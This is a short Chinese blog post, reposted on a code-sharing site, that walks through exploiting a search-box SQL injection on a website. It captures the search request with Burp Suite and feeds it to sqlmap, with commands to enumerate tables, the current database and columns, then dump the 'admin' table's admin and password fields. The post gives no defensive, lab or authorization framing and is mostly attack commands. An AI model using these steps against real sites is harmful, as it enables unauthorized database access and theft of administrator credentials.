码迷,mamicode.com
首页 > 数据库 > 详细

burpsuit辅助sqlmap攻击

时间:2017-04-22 14:34:02      阅读:372      评论:0      收藏:0      [点我收藏+]

标签:搜索型注入

今天发现一个搜索型注入,主要是利用网站的搜索引擎来注入的


例如下图所示:

技术分享

在这个搜索 地方,我们可以输入2个字符验证他们是否能注入;

输入:‘  出错

输入:% 不出错

满足以上2点,即可注入,我们要用到的工具为burpsuit,sqlmap


1:首先我们在搜索框里随便输入一个数字,我这里输入123,利用burpsuit把他抓包抓下来

技术分享

2:然后把抓包抓下来的复制,然后粘贴到文本文档上去,保存到1.txt文件里

命令为:python sqlmap/sqlmap.py -r 1.txt


3:python sqlmap/sqlmap.py -r 1.txt  --tables   猜表名

4:python sqlmap/sqlmap.py -r 1.txt   --current-db  查看当前的数据库

5:python sqlmap/sqlmap.py -r 1.txt    -T admin --columns 猜列名

6:python sqlmap/sqlmap.py -r 1.txt    -D 指定数据库 -T admin -C admin,password --dump

 



综上,即可。

本文出自 “costin” 博客,请务必保留此出处http://brighttime.blog.51cto.com/12837169/1918433

burpsuit辅助sqlmap攻击

标签:搜索型注入

原文地址:http://brighttime.blog.51cto.com/12837169/1918433

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!